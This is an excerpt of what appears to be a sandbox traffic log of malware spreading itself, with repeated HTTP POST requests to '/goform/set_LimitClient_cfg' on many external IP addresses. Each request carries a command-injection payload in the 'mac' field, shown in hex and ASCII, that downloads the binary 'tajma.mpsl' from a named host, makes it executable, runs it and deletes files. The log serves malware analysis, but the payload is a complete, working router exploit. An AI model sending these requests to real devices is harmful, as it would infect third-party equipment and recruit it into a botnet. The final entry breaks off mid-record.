                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        330192.168.2.2348012150.30.124.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290250063 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        331192.168.2.2355132204.48.152.1748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290278912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        332192.168.2.2345148122.20.236.948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290400028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        333192.168.2.2333056140.136.204.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290436983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        334192.168.2.2349086205.35.119.2478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290493011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        335192.168.2.234968860.67.181.1228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290518045 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        336192.168.2.234111694.227.30.1108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290570021 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        337192.168.2.2347922120.96.238.2298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290597916 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        338192.168.2.235106046.112.22.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290618896 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        339192.168.2.235496272.171.101.1338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290618896 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        340192.168.2.2355644205.153.166.188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290641069 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        341192.168.2.2333060118.186.29.1328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290666103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        342192.168.2.234205265.228.107.728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290693998 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        343192.168.2.234928060.25.99.2448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290719986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        344192.168.2.2347694133.62.238.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290745974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        345192.168.2.2340296213.77.42.698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290772915 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        346192.168.2.235117224.173.36.1218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290793896 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        347192.168.2.2338680189.191.62.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290834904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        348192.168.2.233865073.60.203.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290869951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        349192.168.2.2360050200.57.100.588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290869951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        350192.168.2.234371834.174.123.1888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290899992 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        351192.168.2.233777439.131.158.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290971994 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        352192.168.2.234747017.43.104.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291011095 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
